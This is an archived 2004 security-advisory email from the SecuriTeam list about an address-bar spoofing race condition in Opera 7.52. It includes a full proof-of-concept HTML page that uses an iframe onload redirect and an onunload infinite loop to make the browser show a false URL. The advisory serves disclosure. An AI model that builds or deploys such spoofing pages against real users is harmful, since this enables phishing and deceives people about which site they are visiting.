[NT] Opera Address Bar Spoofing Condition

From: SecuriTeam (support_at_securiteam.com)
Date: 07/11/04

  • Next message: SecuriTeam: "[EXPL] MySQL Authentication Bypass Client Patch Proof Of Concept Exploit" 
    To: list@securiteam.com
Date: 11 Jul 2004 12:00:39 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Opera Address Bar Spoofing Condition
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.opera.com/> Opera is "a cross-platform web browser". Due to a
    race condition in Opera it is possible to spoof the contents of the
    address bar using a specially crafted HTML page.

    DETAILS

    Vulnerable Systems:
     * Opera version 7.52 build 3834

    A race condition in Opera allows the following crafted HTML page to spoof
    the address bar in Opera.

    Exploit:
    [!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
    [html lang="en"]
    [head]
    [meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
    [meta http-equiv="Content-Script-Type" content="text/javascript"]
    [meta http-equiv="Content-Style-Type" content="text/css"]
    [title]Opera 7.52 Address Bar Spoofing Vulnerability[/title]
    [style type="text/css"]
    [!-- /* begin */
      h1 { font-size:120%;}
      h2 { font-size:100%;}
    /* end */ --]
    [/style]
    [script type="text/javascript"]
    [!--
    function urlfake(){
    location.href="http://www.microsoft.com/";
    }
    function preinline () {
    myvar = '[iframe onload="urlfake()" ';
    myvar = myvar + 'title="preload inline frame" ';
    myvar = myvar + 'src="http://www.opera.com/" ';
    myvar = myvar + 'frameborder="0" width="760" height="1800" ';
    myvar = myvar + 'marginwidth="0" marginheight="0"]';
    myvar = myvar + '[' + '/iframe]';
    document.write (myvar);
    }
    // --]
    [/script]
    [/head]
    [body onunload="while(1){};"]
    [h1]Opera Browser 7.52 (Build 3834) Address Bar Spoofing Issue[/h1]
    [h2]Tested on WindowsXP SP1[/h2]
    [p]
    [script type="text/javascript"]
    [!--
    preinline ();
    // --]
    [/script]
    [/p]
    [/body]
    [/html]

    Note: Angle brackets have been replaced by square brackets for security
    reasons.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:bitlance_3@hotmail.com>
    bitlance winter.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] MySQL Authentication Bypass Client Patch Proof Of Concept Exploit"

    Relevant Pages